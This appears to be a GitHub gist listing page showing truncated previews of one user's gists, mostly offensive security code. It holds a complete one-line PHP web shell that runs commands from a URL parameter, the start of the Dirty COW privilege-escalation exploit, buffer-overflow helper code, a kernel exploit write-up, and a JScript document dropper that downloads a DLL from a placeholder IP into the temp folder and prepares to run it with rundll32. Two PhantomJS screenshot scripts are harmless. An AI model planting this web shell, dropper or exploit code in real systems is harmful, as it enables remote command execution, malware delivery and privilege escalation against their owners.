ivanvza
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| python -m SimpleHTTPServer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php system($_GET["cmd"]); ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var page = require('webpage').create(); | |
| page.viewportSize = { width: 640, height: 480 }; | |
| page.open('<web page>', function () { | |
| setInterval(function() { | |
| page.render('image.png', { format: "png" }); | |
| }, 25); | |
| }); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var page = require('webpage').create(); | |
| page.viewportSize = { width: 640, height: 480 }; | |
| page.open('<wep page>', function () { | |
| setTimeout(function() { | |
| // Initial frame | |
| var frame = 0; | |
| // Add an interval every 25th second | |
| setInterval(function() { | |
| // Render an image with the frame name |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ####################### dirtyc0w.c ####################### | |
| $ sudo -s | |
| # echo this is not a test > foo | |
| # chmod 0404 foo | |
| $ ls -lah foo | |
| -r-----r-- 1 root root 19 Oct 20 15:23 foo | |
| $ cat foo | |
| this is not a test | |
| $ gcc -lpthread dirtyc0w.c -o dirtyc0w |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| # USAGE: | |
| # ~$ export PWN='echo 1' | |
| # ~$ ./getenvaddr PWN ./pwnme | |
| # PWN will be at 0xbfffff7d | |
| int main(int argc, char *argv[]) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <sys/socket.h> | |
| #include <arpa/inet.h> | |
| #include <stdlib.h> | |
| #include <netdb.h> | |
| #include <string.h> | |
| int create_tcp_socket(); | |
| char *get_ip(char *host); | |
| char *build_get_query(char *host, char *page); | |
| void usage(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <string.h> | |
| #include <stdint.h> | |
| #include <stdlib.h> | |
| #include <sys/socket.h> | |
| #include <netinet/in.h> | |
| #include <arpa/inet.h> | |
| #include <sys/mman.h> | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // clang -O3 -o task_nicely_t task_nicely_t.c | |
| /* | |
| task_t considered harmful | |
| TL;DR | |
| you cannot hold or use a task struct pointer and expect the euid of that task to stay the same. | |
| Many many places in the kernel do this and there are a great many very exploitable bugs as a result. | |
| ******** |
ivanvza
/ javascript_dropper.doc.js
Created
February 28, 2017 20:30
Simple JS exploit used in the old .doc style
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| urls = ["http://<IP HERE>"] | |
| var wscript = WScript["CreateObject"]("WScript.Shell"); | |
| var wscript_env = wscript.ExpandEnvironmentStrings("%T" + "EMP%/"); | |
| var dll = wscript_env + "jEiwaeU3NSUv"; | |
| var dll_filename = dll + ".d" + "ll"; | |
| var system_arch = wscript.Environment("System"); | |
| if (system_arch("PROCESSOR_ARCHITECTURE").toLowerCase() == "amd64") { | |
| var rundll_arch_patch = wscript.ExpandEnvironmentStrings("%SystemRoot%\\SysWOW64\\rundll32.exe"); |
OlderNewer